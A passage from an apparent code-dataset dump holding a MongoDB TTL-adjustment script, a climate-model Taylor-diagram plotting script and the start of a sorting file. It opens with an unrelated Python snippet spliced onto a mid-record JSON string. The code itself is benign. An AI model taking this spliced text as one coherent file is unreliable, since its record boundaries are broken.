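    g = reduce(gcd, gaps)          # the common spacing of the final tree line
    return (positions[-1] - positions[0]) // g + 1 - len(positions)

print(missing_trees([1, 3, 7, 13]))   # 3 extra trees at spacing 2
```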
gevent.monkey.patch_socket()\n\n source_client = utils.mongo_connect(source['host'], source['port'],\n ensure_direct=True,\n max_pool_size=30,\n read_preference=ReadPreference.SECONDARY,\n document_class=FasterOrderedDict)\n\n source_collection = source_client[source['db']][source['collection']]\n if source_client.is_mongos:\n raise Exception(\"for performance reasons, sources must be mongod instances; %s:%d is not\",\n source['host'], source['port'])\n\n if seconds < 0:\n log.info(\"Skipping update, TTL less than 0\")\n return\n\n stats = Stats()\n stats.total_docs = int(source_collection.count())\n\n ids = []\n cursor = source_collection.find(fields=[\"_id\"], snapshot=True, timeout=False)\n cursor.batch_size(5000)\n insert_pool = Pool(40)\n stats_greenlet = gevent.spawn(_ttl_stats_worker, stats)\n\n for doc in cursor:\n _id = doc[\"_id\"]\n\n ids.append(_id)\n if len(ids) % 250 == 0:\n outgoing_ids = ids\n ids = []\n insert_pool.spawn(adjust_ttl_batch_worker,\n source_collection=source_collection,\n seconds=seconds,\n ids=outgoing_ids,\n stats=stats)\n\n gevent.sleep()\n\n if len(ids) > 0:\n adjust_ttl_batch_worker(source_collection=source_collection,\n seconds=seconds,\n ids=ids,\n stats=stats)\n\n\n insert_pool.join()\n stats.log()\n stats_greenlet.kill()\n log.info(\"Finished TTL adjust\")\n\n\n\n\n\n\ndef update_ttls_parent(sources, state_db, args):\n\n process_names = {repr(source): \"%s:%d\" % (source['host'], source['port'])\n for source in sources}\n\n processes = []\n for source in sources:\n name = process_names[repr(source)]\n process = multiprocessing.Process(target=update_ttls,\n name=name,\n kwargs=dict(source=source,\n state_path=state_db._path,\n seconds=args.seconds))\n\n process.start()\n processes.append(process)\n\n utils.wait_for_processes(processes)\n\n\nif __name__ == '__main__':\n # NOTE: we are not gevent monkey-patched here; only child processes are monkey-patched,\n # so all ops below are synchronous\n\n # parse command-line options\n import argparse\n\n parser = argparse.ArgumentParser(description='Adjusts TTL values for messages in the database.')\n parser.add_argument(\n '--source', type=str, required=True, metavar='URL',\n help='source to read from; can be a file containing sources or a url like: host[:port]/db/collection; '\n 'e.g. 
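The update loop above flushes a worker batch every 250 ids and drains the remainder once the cursor is exhausted. The same pattern as a generic, self-contained generator:

```python
def batches(iterable, size=250):
    batch = []
    for item in iterable:
        batch.append(item)
        if len(batch) == size:
            yield batch            # flush a full batch
            batch = []
    if batch:
        yield batch                # drain the final partial batch

for chunk in batches(range(1005)):
    pass  # hand `chunk` to a worker pool here
```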
localhost:27017/prod_maestro.emails')\n parser.add_argument(\n '--seconds', type=int, required=True, metavar=\"Minutes\",\n help='Adjust the TTL of the messages database by N minutes'\n )\n args = parser.parse_args()\n\n # parse source\n if os.path.exists(args.source):\n sources = utils.parse_source_file(args.source)\n else:\n sources = [utils.parse_mongo_url(args.source)]\n\n # initialize sqlite database that holds our state (this may seem like overkill,\n # but it's actually needed to ensure proper synchronization of subprocesses)\n args.state_db = '%s.%s.db' % (sources[0]['db'], sources[0]['collection'])\n\n\n\n state_db_path = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n args.state_db)\n\n log.info('using state db %s' % state_db_path)\n state_db_exists = os.path.exists(state_db_path)\n state_db = CopyStateDB(state_db_path)\n if not state_db_exists:\n state_db.drop_and_create()\n\n # do the real work\n update_ttls_parent(sources, state_db, args)\n log.info(\"SUCCESS!!\")\n\n\n\n\n\n\n","sub_path":"adjust_ttl.py","file_name":"adjust_ttl.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"302141154","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Leidinice Silva\"\n__email__ = \"leidinicesilva@gmail.com\"\n__date__ = \"01/08/2019\"\n__description__ = \"This script plot taylor diagram from regcm47 and hadgem models and obs database\"\n\nimport os\nimport netCDF4\nimport numpy as np\nimport numpy.ma as ma\nimport scipy.stats as st\nimport matplotlib.pyplot as plt\nimport mpl_toolkits.axisartist.floating_axes as FA\nimport mpl_toolkits.axisartist.grid_finder as GF\n\nfrom matplotlib.projections import PolarAxes\n\n\nclass TaylorDiagram(object):\n \"\"\"\n Taylor diagram.\n Plot model standard deviation and correlation to reference (data)\n sample in a single-quadrant polar plot, with r=stddev and\n theta=arccos(correlation).\n \"\"\"\n\n def __init__(self, refstd, fig=None, rect=336, label='_', marker='', color='', srange=(0., 3.), extend=False):\n \"\"\"\n Set up Taylor diagram axes, i.e. 
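`utils.wait_for_processes` is relied on above but not shown; a plausible minimal equivalent, offered as an assumption (the real helper may differ):

```python
import multiprocessing
import time

def wait_for_processes(processes):
    for p in processes:
        p.join()                   # block until each child exits
        if p.exitcode != 0:
            raise RuntimeError('%s exited with code %s' % (p.name, p.exitcode))

if __name__ == '__main__':
    procs = [multiprocessing.Process(target=time.sleep, args=(0.1,))
             for _ in range(3)]
    for p in procs:
        p.start()
    wait_for_processes(procs)
```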
single quadrant polar\n plot, using `mpl_toolkits.axisartist.floating_axes`.\n Parameters:\n * refstd: reference standard deviation to be compared to\n * fig: input Figure or None\n * rect: subplot definition\n * label: reference label\n * srange: stddev axis extension, in units of *refstd*\n * extend: extend diagram to negative correlations\n \"\"\"\n\n self.refstd = refstd \n tr = PolarAxes.PolarTransform()\n\n # Correlation labels\n rlocs = np.array([0, 0.2, 0.4, 0.6, 0.8, 0.9, 0.98, 1])\n \n if extend:\n # Diagram extended to negative correlations\n self.tmax = np.pi\n rlocs = np.concatenate((-rlocs[:0:-1], rlocs))\n else:\n # Diagram limited to positive correlations\n self.tmax = np.pi/2\n \n tlocs = np.arccos(rlocs) # Conversion to polar angles\n gl1 = GF.FixedLocator(tlocs) # Positions\n tf1 = GF.DictFormatter(dict(zip(tlocs, map(str, rlocs))))\n\n # Standard deviation axis extent (in units of reference stddev)\n self.smin = srange[0] * self.refstd\n self.smax = srange[1] * self.refstd\n \n ghelper = FA.GridHelperCurveLinear(tr,\n extremes=(0,self.tmax, # 1st quadrant\n self.smin,self.smax),\n grid_locator1=gl1,\n tick_formatter1=tf1,\n )\n \n if fig is None:\n fig = plt.figure()\n \n ax = FA.FloatingSubplot(fig, rect, grid_helper=ghelper)\n fig.add_subplot(ax)\n\n # Adjust axes\n ax.axis[\"top\"].set_axis_direction(\"bottom\") # \"Angle axis\"\n ax.axis[\"top\"].toggle(ticklabels=True, label=True)\n ax.axis[\"top\"].major_ticklabels.set_axis_direction(\"top\")\n ax.axis[\"top\"].label.set_axis_direction(\"top\")\n ax.axis[\"top\"].label.set_text(u' Correlação')\n\n ax.axis[\"left\"].set_axis_direction(\"bottom\") # \"X axis\"\n ax.axis[\"left\"].toggle(ticklabels=True, label=True)\n ax.axis[\"left\"].major_ticklabels.set_rotation(-90)\n ax.axis[\"left\"].label.set_pad(10) \n ax.axis[\"left\"].label.set_text(u' Desvio padrão')\n \t\t\n ax.axis[\"right\"].set_axis_direction(\"top\") # \"Y-axis\"\n ax.axis[\"right\"].toggle(ticklabels=True, label=True)\n ax.axis[\"right\"].major_ticklabels.set_rotation(90)\n ax.axis[\"right\"].major_ticklabels.set_pad(12)\n ax.axis[\"bottom\"].set_visible(False) # Unused\n\n #~ ax.grid(color='k', axis='x', linestyle='--', linewidth=1)\n \n #~ if self.smin:\n #~ ax.axis[\"bottom\"].toggle(ticklabels=True, label=True)\n #~ else:\n\n self._ax = ax # Graphical axes\n self.ax = ax.get_aux_axes(tr) # Polar coordinates\n\n # Add reference point and stddev contour\n l, = self.ax.plot([0], self.refstd, 'k*', ls='', ms=8, label=label)\n t = np.linspace(0, self.tmax)\n r = np.zeros_like(t) + self.refstd\n self.ax.plot(t, r, 'k--', label='_')\n\n # Collect sample points for latter use (e.g. legend)\n self.samplePoints = [l]\n\n\n def add_sample(self, stddev, corrcoef, *args, **kwargs):\n \"\"\"\n Add sample (*stddev*, *corrcoeff*) to the Taylor\n diagram. 
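The diagram geometry above maps correlation r to the polar angle arccos(r), with the standard deviation as the radius. A quick numeric check:

```python
import numpy as np

for r in (1.0, 0.9, 0.5, 0.0):
    print(r, round(np.degrees(np.arccos(r)), 1))   # 0.0, 25.8, 60.0, 90.0
```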
*args* and *kwargs* are directly propagated to the\n 'Figure.plot' command.\n \"\"\"\n\t\n l, = self.ax.plot(np.arccos(corrcoef), stddev, *args, **kwargs) # (theta, radius)\n self.samplePoints.append(l)\n \n return l\n \n\n def add_grid(self, *args, **kwargs):\n \"\"\"Add a grid.\"\"\"\n \n self._ax.grid(*args, **kwargs)\n \n\n def add_contours(self, levels=5, **kwargs):\n \"\"\"\n Add constant centered RMS difference contours, defined by *levels*.\n \"\"\"\n \n rs, ts = np.meshgrid(np.linspace(self.smin, self.smax), np.linspace(0, self.tmax))\n rms = np.sqrt(self.refstd**2 + rs**2 - 2*self.refstd*rs*np.cos(ts))\n contours = self.ax.contour(ts, rs, rms, levels, **kwargs)\n \n return contours\n\n\ndef import_obs(var, area, dataset, dt):\n\t\n\tpath = '/home/nice/Documents/dataset/obs/reg_exp1'\n\tarq = '{0}/{1}_{2}_{3}_obs_mon_{4}_lonlat.nc'.format(path, var, area, dataset, dt)\t\n\t\t\t\n\tdata = netCDF4.Dataset(arq)\n\tvar = data.variables[var][:] \n\tlat = data.variables['lat'][:]\n\tlon = data.variables['lon'][:]\n\tvalue = var[:][:,:,:]\n\t\n\tseason_obs = value[2:239:3,:,:]\n\tdjf_obs = np.nanmean(np.nanmean(season_obs[3:80:4], axis=1), axis=1)\n\tmam_obs = np.nanmean(np.nanmean(season_obs[0:80:4], axis=1), axis=1)\n\tjja_obs = np.nanmean(np.nanmean(season_obs[1:80:4], axis=1), axis=1)\n\tson_obs = np.nanmean(np.nanmean(season_obs[2:80:4], axis=1), axis=1)\n\tannual_obs = np.nanmean(np.nanmean(value[0:240:12,:,:], axis=1), axis=1)\n\n\treturn djf_obs, mam_obs, jja_obs, son_obs, annual_obs\n\t\n\ndef import_rcm(var, area, mod, dt):\n\t\n\tpath = '/home/nice/Documents/dataset/rcm/reg_exp1/hist'\n\tarq = '{0}/{1}_{2}_{3}_hist_mon_{4}_lonlat_seamask.nc'.format(path, var, area, mod, dt)\t\n\n\tdata = netCDF4.Dataset(arq)\n\tvar = data.variables[var][:]\n\tlat = data.variables['lat'][:]\n\tlon = data.variables['lon'][:]\n\tvalue = var[:][:,:,:]\n\t\n\tseason_rcm = value[2:239:3,:,:]\n\tdjf_rcm = np.nanmean(np.nanmean(season_rcm[3:80:4], axis=1), axis=1)\n\tmam_rcm = np.nanmean(np.nanmean(season_rcm[0:80:4], axis=1), axis=1)\n\tjja_rcm = np.nanmean(np.nanmean(season_rcm[1:80:4], axis=1), axis=1)\n\tson_rcm = np.nanmean(np.nanmean(season_rcm[2:80:4], axis=1), axis=1)\n\tannual_rcm = np.nanmean(np.nanmean(value[0:240:12,:,:], axis=1), axis=1)\n\n\treturn djf_rcm, mam_rcm, jja_rcm, son_rcm, annual_rcm\n\n\ndef import_gcm(var, area, mod, dt):\n\t\n\tpath = '/home/nice/Documents/dataset/gcm/reg_exp1/hist'\t\n\tarq = '{0}/{1}_{2}_Amon_{3}_hist_r1i1p1_mon_{4}_lonlat_seamask.nc'.format(path, var, area, mod, dt)\t\n\t\t\n\tdata = netCDF4.Dataset(arq)\n\tvar = data.variables[var][:]\n\tlat = data.variables['lat'][:]\n\tlon = data.variables['lon'][:]\n\tvalue = var[:][:,:,:]\n\n\tseason_gcm = value[2:240:3,:,:]\n\tdjf_gcm = np.nanmean(np.nanmean(season_gcm[3:80:4], axis=1), axis=1)\n\tmam_gcm = np.nanmean(np.nanmean(season_gcm[0:80:4], axis=1), axis=1)\n\tjja_gcm = np.nanmean(np.nanmean(season_gcm[1:80:4], axis=1), axis=1)\n\tson_gcm = np.nanmean(np.nanmean(season_gcm[2:80:4], axis=1), axis=1)\n\tannual_gcm = np.nanmean(np.nanmean(value[0:240:12,:,:], axis=1), axis=1)\n\n\treturn djf_gcm, mam_gcm, jja_gcm, son_gcm, annual_gcm\n\n\nif __name__=='__main__':\n\t\n\t# Import models and obs database \n\t# Precipitation\n\tpre_djf_cru_samz, pre_mam_cru_samz, pre_jja_cru_samz, pre_son_cru_samz, pre_annual_cru_samz = import_obs('pre', 'samz', 'cru_ts4.04', '1986-2005')\t \n\tpre_djf_cru_eneb, pre_mam_cru_eneb, pre_jja_cru_eneb, pre_son_cru_eneb, pre_annual_cru_eneb = import_obs('pre', 'eneb', 'cru_ts4.04', 
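`add_contours` above derives its levels from the law of cosines for the centered RMS difference, E'^2 = s_ref^2 + s^2 - 2*s_ref*s*r. A scalar check:

```python
import numpy as np

s_ref, s, r = 1.0, 1.2, 0.9
rms = np.sqrt(s_ref**2 + s**2 - 2 * s_ref * s * r)
print(round(rms, 3))   # 0.529
```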
'1986-2005')\t \n\tpre_djf_cru_matopiba, pre_mam_cru_matopiba, pre_jja_cru_matopiba, pre_son_cru_matopiba, pre_annual_cru_matopiba = import_obs('pre', 'matopiba', 'cru_ts4.04', '1986-2005')\t \n\n\tpre_djf_rcm_samz, pre_mam_rcm_samz, pre_jja_rcm_samz, pre_son_rcm_samz, pre_annual_rcm_samz = import_rcm('pr', 'samz', 'reg_had', '1986-2005')\t \n\tpre_djf_rcm_eneb, pre_mam_rcm_eneb, pre_jja_rcm_eneb, pre_son_rcm_eneb, pre_annual_rcm_eneb = import_rcm('pr', 'eneb', 'reg_had', '1986-2005')\t \n\tpre_djf_rcm_matopiba, pre_mam_rcm_matopiba, pre_jja_rcm_matopiba, pre_son_rcm_matopiba, pre_annual_rcm_matopiba = import_rcm('pr', 'matopiba', 'reg_had', '1986-2005')\t \n\n\tpre_djf_gcm_samz, pre_mam_gcm_samz, pre_jja_gcm_samz, pre_son_gcm_samz, pre_annual_gcm_samz = import_gcm('pr', 'samz', 'HadGEM2-ES', '1986-2005')\t \n\tpre_djf_gcm_eneb, pre_mam_gcm_eneb, pre_jja_gcm_eneb, pre_son_gcm_eneb, pre_annual_gcm_eneb = import_gcm('pr', 'eneb', 'HadGEM2-ES', '1986-2005')\t \n\tpre_djf_gcm_matopiba, pre_mam_gcm_matopiba, pre_jja_gcm_matopiba, pre_son_gcm_matopiba, pre_annual_gcm_matopiba = import_gcm('pr', 'matopiba', 'HadGEM2-ES', '1986-2005')\t \n\n\t# Temperature\n\ttas_djf_cru_samz, tas_mam_cru_samz, tas_jja_cru_samz, tas_son_cru_samz, tas_annual_cru_samz = import_obs('tmp', 'samz', 'cru_ts4.04', '1986-2005')\t \n\ttas_djf_cru_eneb, tas_mam_cru_eneb, tas_jja_cru_eneb, tas_son_cru_eneb, tas_annual_cru_eneb = import_obs('tmp', 'eneb', 'cru_ts4.04', '1986-2005')\t \n\ttas_djf_cru_matopiba, tas_mam_cru_matopiba, tas_jja_cru_matopiba, tas_son_cru_matopiba, tas_annual_cru_matopiba = import_obs('tmp', 'matopiba', 'cru_ts4.04', '1986-2005')\t \n\n\ttas_djf_rcm_samz, tas_mam_rcm_samz, tas_jja_rcm_samz, tas_son_rcm_samz, tas_annual_rcm_samz = import_rcm('tas', 'samz', 'reg_had', '1986-2005')\t \n\ttas_djf_rcm_eneb, tas_mam_rcm_eneb, tas_jja_rcm_eneb, tas_son_rcm_eneb, tas_annual_rcm_eneb = import_rcm('tas', 'eneb', 'reg_had', '1986-2005')\t \n\ttas_djf_rcm_matopiba, tas_mam_rcm_matopiba, tas_jja_rcm_matopiba, tas_son_rcm_matopiba, tas_annual_rcm_matopiba = import_rcm('tas', 'matopiba', 'reg_had', '1986-2005')\t \n\n\ttas_djf_gcm_samz, tas_mam_gcm_samz, tas_jja_gcm_samz, tas_son_gcm_samz, tas_annual_gcm_samz = import_gcm('tas', 'samz', 'HadGEM2-ES', '1986-2005')\t \n\ttas_djf_gcm_eneb, tas_mam_gcm_eneb, tas_jja_gcm_eneb, tas_son_gcm_eneb, tas_annual_gcm_eneb = import_gcm('tas', 'eneb', 'HadGEM2-ES', '1986-2005')\t \n\ttas_djf_gcm_matopiba, tas_mam_gcm_matopiba, tas_jja_gcm_matopiba, tas_son_gcm_matopiba, tas_annual_gcm_matopiba = import_gcm('tas', 'matopiba', 'HadGEM2-ES', '1986-2005')\t \n\t\t\n\t# Reference database standard desviation\n\tstdrefs = dict(SAMZ1=1,\n\t\t\t\t SAMZ2=1,\n\t\t\t\t ENEB1=1,\n\t\t\t\t ENEB2=1,\n\t\t\t\t MATOPIBA1=1,\n\t\t\t\t MATOPIBA2=1) \n\n\ttext1 = dict(SAMZ1='A) SAMZ',\n\t\t\t\t SAMZ2='D) SAMZ',\n\t\t\t\t ENEB1='B) ENEB',\n\t\t\t\t ENEB2='E) ENEB',\n\t\t\t\t MATOPIBA1='C) MATOPIBA',\n\t\t\t\t MATOPIBA2='F) MATOPIBA')\n\t\t\t\t \n\t# Compute stddev and correlation coefficient of models\n\tsamples = dict(SAMZ1=[[pre_djf_cru_samz.std(ddof=1), np.corrcoef(pre_djf_cru_samz, pre_djf_rcm_samz)[0,1], 'DJF', 'o', 'g'],\n [pre_mam_cru_samz.std(ddof=1), np.corrcoef(pre_mam_cru_samz, pre_mam_rcm_samz)[0,1], 'MAM', 'o', 'b'],\n [pre_jja_cru_samz.std(ddof=1), np.corrcoef(pre_jja_cru_samz, pre_jja_rcm_samz)[0,1], 'JJA', 'o', 'y'],\n [pre_son_cru_samz.std(ddof=1), np.corrcoef(pre_son_cru_samz, pre_son_rcm_samz)[0,1], 'SON', 'o', 'c'],\n [pre_annual_cru_samz.std(ddof=1), 
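The seasonal slicing in the import functions above, verified on bare indices (assuming index 0 is January 1986): `[2:239:3]` keeps every third month (the season-end months), then strides of 4 within that pick one season per year:

```python
import numpy as np

months = np.arange(240)           # 0 = Jan 1986, ..., 239 = Dec 2005
season_ends = months[2:239:3]     # 2, 5, 8, 11, ...  (Mar, Jun, Sep, Dec)
print(season_ends[3:80:4][:3])    # [11 23 35] -> the December entries (DJF)
print(season_ends[0:80:4][:3])    # [ 2 14 26] -> the March entries (MAM)
```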
np.corrcoef(pre_annual_cru_samz, pre_annual_rcm_samz)[0,1], 'ANN', 'o', 'r'],\n [pre_djf_cru_samz.std(ddof=1), np.corrcoef(pre_djf_cru_samz, pre_djf_gcm_samz)[0,1], 'DJF', 's', 'g'],\n [pre_mam_cru_samz.std(ddof=1), np.corrcoef(pre_mam_cru_samz, pre_mam_gcm_samz)[0,1], 'MAM', 's', 'b'],\n [pre_jja_cru_samz.std(ddof=1), np.corrcoef(pre_jja_cru_samz, pre_jja_gcm_samz)[0,1], 'JJA', 's', 'y'],\n [pre_son_cru_samz.std(ddof=1), np.corrcoef(pre_son_cru_samz, pre_son_gcm_samz)[0,1], 'SON', 's', 'c'],\n [pre_annual_cru_samz.std(ddof=1), np.corrcoef(pre_annual_cru_samz, pre_annual_gcm_samz)[0,1], 'ANN', 's', 'r']],\n SAMZ2=[[tas_djf_cru_samz.std(ddof=1), np.corrcoef(tas_djf_cru_samz, np.nanmean(tas_djf_rcm_samz, axis=1))[0,1], 'DJF', 'o', 'g'],\n [tas_mam_cru_samz.std(ddof=1), np.corrcoef(tas_mam_cru_samz, np.nanmean(tas_mam_rcm_samz, axis=1))[0,1], 'MAM', 'o', 'b'],\n [tas_jja_cru_samz.std(ddof=1), np.corrcoef(tas_jja_cru_samz, np.nanmean(tas_jja_rcm_samz, axis=1))[0,1], 'JJA', 'o', 'y'],\n [tas_son_cru_samz.std(ddof=1), np.corrcoef(tas_son_cru_samz, np.nanmean(tas_son_rcm_samz, axis=1))[0,1], 'SON', 'o', 'c'],\n [tas_annual_cru_samz.std(ddof=1), np.corrcoef(tas_annual_cru_samz, np.nanmean(tas_annual_rcm_samz, axis=1))[0,1], 'ANN', 'o', 'r'],\n [tas_djf_cru_samz.std(ddof=1), np.corrcoef(tas_djf_cru_samz, tas_djf_gcm_samz)[0,1], 'DJF', 's', 'g'],\n [tas_mam_cru_samz.std(ddof=1), np.corrcoef(tas_mam_cru_samz, tas_mam_gcm_samz)[0,1], 'MAM', 's', 'b'],\n [tas_jja_cru_samz.std(ddof=1), np.corrcoef(tas_jja_cru_samz, tas_jja_gcm_samz)[0,1], 'JJA', 's', 'y'],\n [tas_son_cru_samz.std(ddof=1), np.corrcoef(tas_son_cru_samz, tas_son_gcm_samz)[0,1], 'SON', 's', 'c'],\n [tas_annual_cru_samz.std(ddof=1), np.corrcoef(tas_annual_cru_samz, tas_annual_gcm_samz)[0,1], 'ANN', 's', 'r']],\n ENEB1=[[pre_djf_cru_eneb.std(ddof=1), np.corrcoef(pre_djf_cru_eneb, pre_djf_rcm_eneb)[0,1], 'DJF', 'o', 'g'],\n [pre_mam_cru_eneb.std(ddof=1), np.corrcoef(pre_mam_cru_eneb, pre_mam_rcm_eneb)[0,1], 'MAM', 'o', 'b'],\n [pre_jja_cru_eneb.std(ddof=1), np.corrcoef(pre_jja_cru_eneb, pre_jja_rcm_eneb)[0,1], 'JJA', 'o', 'y'],\n [pre_son_cru_eneb.std(ddof=1), np.corrcoef(pre_son_cru_eneb, pre_son_rcm_eneb)[0,1], 'SON', 'o', 'c'],\n [pre_annual_cru_eneb.std(ddof=1), np.corrcoef(pre_annual_cru_eneb, pre_annual_rcm_eneb)[0,1], 'ANN', 'o', 'r'],\n [pre_djf_cru_eneb.std(ddof=1), np.corrcoef(pre_djf_cru_eneb, pre_djf_gcm_eneb)[0,1], 'DJF', 's', 'g'],\n [pre_mam_cru_eneb.std(ddof=1), np.corrcoef(pre_mam_cru_eneb, pre_mam_gcm_eneb)[0,1], 'MAM', 's', 'b'],\n [pre_jja_cru_eneb.std(ddof=1), np.corrcoef(pre_jja_cru_eneb, pre_jja_gcm_eneb)[0,1], 'JJA', 's', 'y'],\n [pre_son_cru_eneb.std(ddof=1), np.corrcoef(pre_son_cru_eneb, pre_son_gcm_eneb)[0,1], 'SON', 's', 'c'],\n [pre_annual_cru_eneb.std(ddof=1), np.corrcoef(pre_annual_cru_eneb, pre_annual_gcm_eneb)[0,1], 'ANN', 's', 'r']], \n ENEB2=[[tas_djf_cru_eneb.std(ddof=1), np.corrcoef(tas_djf_cru_eneb, np.nanmean(tas_djf_rcm_eneb, axis=1))[0,1], 'DJF', 'o', 'g'],\n [tas_mam_cru_eneb.std(ddof=1), np.corrcoef(tas_mam_cru_eneb, np.nanmean(tas_mam_rcm_eneb, axis=1))[0,1], 'MAM', 'o', 'b'],\n [tas_jja_cru_eneb.std(ddof=1), np.corrcoef(tas_jja_cru_eneb, np.nanmean(tas_jja_rcm_eneb, axis=1))[0,1], 'JJA', 'o', 'y'],\n [tas_son_cru_eneb.std(ddof=1), np.corrcoef(tas_son_cru_eneb, np.nanmean(tas_son_rcm_eneb, axis=1))[0,1], 'SON', 'o', 'c'],\n [tas_annual_cru_eneb.std(ddof=1), np.corrcoef(tas_annual_cru_eneb, np.nanmean(tas_annual_rcm_eneb, axis=1))[0,1], 'ANN', 'o', 'r'],\n [tas_djf_cru_eneb.std(ddof=1), 
np.corrcoef(tas_djf_cru_eneb, tas_djf_gcm_eneb)[0,1], 'DJF', 's', 'g'],\n [tas_mam_cru_eneb.std(ddof=1), np.corrcoef(tas_mam_cru_eneb, tas_mam_gcm_eneb)[0,1], 'MAM', 's', 'b'],\n [tas_jja_cru_eneb.std(ddof=1), np.corrcoef(tas_jja_cru_eneb, tas_jja_gcm_eneb)[0,1], 'JJA', 's', 'y'],\n [tas_son_cru_eneb.std(ddof=1), np.corrcoef(tas_son_cru_eneb, tas_son_gcm_eneb)[0,1], 'SON', 's', 'c'],\n [tas_annual_cru_eneb.std(ddof=1), np.corrcoef(tas_annual_cru_eneb, tas_annual_gcm_eneb)[0,1], 'ANN', 's', 'r']],\n MATOPIBA1=[[pre_djf_cru_matopiba.std(ddof=1), np.corrcoef(pre_djf_cru_matopiba, pre_djf_rcm_matopiba)[0,1], 'DJF', 'o', 'g'],\n [pre_mam_cru_matopiba.std(ddof=1), np.corrcoef(pre_mam_cru_matopiba, pre_mam_rcm_matopiba)[0,1], 'MAM', 'o', 'b'],\n [pre_jja_cru_matopiba.std(ddof=1), np.corrcoef(pre_jja_cru_matopiba, pre_jja_rcm_matopiba)[0,1], 'JJA', 'o', 'y'],\n [pre_son_cru_matopiba.std(ddof=1), np.corrcoef(pre_son_cru_matopiba, pre_son_rcm_matopiba)[0,1], 'SON', 'o', 'c'],\n [pre_annual_cru_matopiba.std(ddof=1), np.corrcoef(pre_annual_cru_matopiba, pre_annual_rcm_matopiba)[0,1], 'ANN', 'o', 'r'],\n [pre_djf_cru_matopiba.std(ddof=1), np.corrcoef(pre_djf_cru_matopiba, pre_djf_gcm_matopiba)[0,1], 'DJF', 's', 'g'],\n [pre_mam_cru_matopiba.std(ddof=1), np.corrcoef(pre_mam_cru_matopiba, pre_mam_gcm_matopiba)[0,1], 'MAM', 's', 'b'],\n [pre_jja_cru_matopiba.std(ddof=1), np.corrcoef(pre_jja_cru_matopiba, pre_jja_gcm_matopiba)[0,1], 'JJA', 's', 'y'],\n [pre_son_cru_matopiba.std(ddof=1), np.corrcoef(pre_son_cru_matopiba, pre_son_gcm_matopiba)[0,1], 'SON', 's', 'c'],\n [pre_annual_cru_matopiba.std(ddof=1), np.corrcoef(pre_annual_cru_matopiba, pre_annual_gcm_matopiba)[0,1], 'ANN', 's', 'r']], \n MATOPIBA2=[[tas_djf_cru_matopiba.std(ddof=1), np.corrcoef(tas_djf_cru_matopiba, np.nanmean(tas_djf_rcm_matopiba, axis=1))[0,1], 'DJF', 'o', 'g'],\n [tas_mam_cru_matopiba.std(ddof=1), np.corrcoef(tas_mam_cru_matopiba, np.nanmean(tas_mam_rcm_matopiba, axis=1))[0,1], 'MAM', 'o', 'b'],\n [tas_jja_cru_matopiba.std(ddof=1), np.corrcoef(tas_jja_cru_matopiba, np.nanmean(tas_jja_rcm_matopiba, axis=1))[0,1], 'JJA', 'o', 'y'],\n [tas_son_cru_matopiba.std(ddof=1), np.corrcoef(tas_son_cru_matopiba, np.nanmean(tas_son_rcm_matopiba, axis=1))[0,1], 'SON', 'o', 'c'],\n [tas_annual_cru_matopiba.std(ddof=1), np.corrcoef(tas_annual_cru_matopiba, np.nanmean(tas_annual_rcm_matopiba, axis=1))[0,1], 'ANN', 'o', 'r'],\n [tas_djf_cru_matopiba.std(ddof=1), np.corrcoef(tas_djf_cru_matopiba, tas_djf_gcm_matopiba)[0,1], 'DJF', 's', 'g'],\n [tas_mam_cru_matopiba.std(ddof=1), np.corrcoef(tas_mam_cru_matopiba, tas_mam_gcm_matopiba)[0,1], 'MAM', 's', 'b'],\n [tas_jja_cru_matopiba.std(ddof=1), np.corrcoef(tas_jja_cru_matopiba, tas_jja_gcm_matopiba)[0,1], 'JJA', 's', 'y'],\n [tas_son_cru_matopiba.std(ddof=1), np.corrcoef(tas_son_cru_matopiba, tas_son_gcm_matopiba)[0,1], 'SON', 's', 'c'],\n [tas_annual_cru_matopiba.std(ddof=1), np.corrcoef(tas_annual_cru_matopiba, tas_annual_gcm_matopiba)[0,1], 'ANN', 's', 'r']])\n\n\tx95 = [0.01, 8.5] # For Tair, this is for 95th level (r = 0.195)\n\ty95 = [0.0, 3]\n\tx99 = [0.01, 0.9] # For Tair, this is for 99th level (r = 0.254)\n\ty99 = [0.0, 3]\n\n\trects = dict(SAMZ1=321,\n\t\t\t\t SAMZ2=322,\n\t\t\t\t ENEB1=323,\n\t\t\t\t ENEB2=324,\n\t\t\t\t MATOPIBA1=325,\n\t\t\t\t MATOPIBA2=326)\n\n\t# Plot models and obs database taylor diagram\n\tfig = plt.figure(figsize=(6, 7))\n\t\n\tfor var in ['SAMZ1', 'SAMZ2', 'ENEB1', 'ENEB2', 'MATOPIBA1', 'MATOPIBA2']:\n\n\t\tdia = TaylorDiagram(stdrefs[var], fig=fig, rect=rects[var], 
label=u'Referência', srange=(0., 3.), extend=True)\n\t\tdia.samplePoints[0].set_color('r')\n\t\tdia.ax.plot(x95,y95,color='black')\n\t\tdia.ax.plot(x99,y99,color='black')\n\t\t\t\t\n\t\t# Add samples to Taylor diagram\n\t\tfor i, (stddev,corrcoef,name,mark,cor) in enumerate(samples[var]):\n\t\t\tdia.add_sample(stddev, corrcoef,\n\t\t\t\t\t\t label=name, marker=mark, mfc=cor, color='black', ms=8, ls='')\t\t\t \n\t\t\tplt.text(-3.3, 3.7, text1[var], fontweight='bold')\n\t\t\t\n\n\t\t# Add RMS contours, and label them\n\t\tcontours = dia.add_contours(levels=5, colors='0.5')\n\t\tplt.clabel(contours, inline=1, fontsize=8, fmt='%.1f')\n\n\tplt.text(-9.0, -1.8, u'Precipitação (mm d⁻¹)')\n\tplt.text(-1.5, -1.8, u'Temperatura (°C)')\n\n\t# Add a figure legend\n\tfig.legend(dia.samplePoints, \n\t\t\t [ p.get_label() for p in dia.samplePoints ], \n\t\t\t prop=dict(size=8), ncol=6, numpoints=1, loc='lower center')\n\t\t\n\t# Path out to save figure\n\tpath_out = '/home/nice/Downloads'\n\tname_out = 'pyplt_taylor_diagram_reg_had_obs_1986-2005.png'\n\tif not os.path.exists(path_out):\n\t\tcreate_path(path_out)\n\tplt.savefig(os.path.join(path_out, name_out), dpi=600, bbox_inches='tight')\n\tplt.show()\n\texit()\n","sub_path":"plot_taylor_diagram_regcm47_obs_exp1.py","file_name":"plot_taylor_diagram_regcm47_obs_exp1.py","file_ext":"py","file_size_in_byte":20979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"184209075","text":"\nimport random\n\n\"\"\"\n# 插入排序:\n# 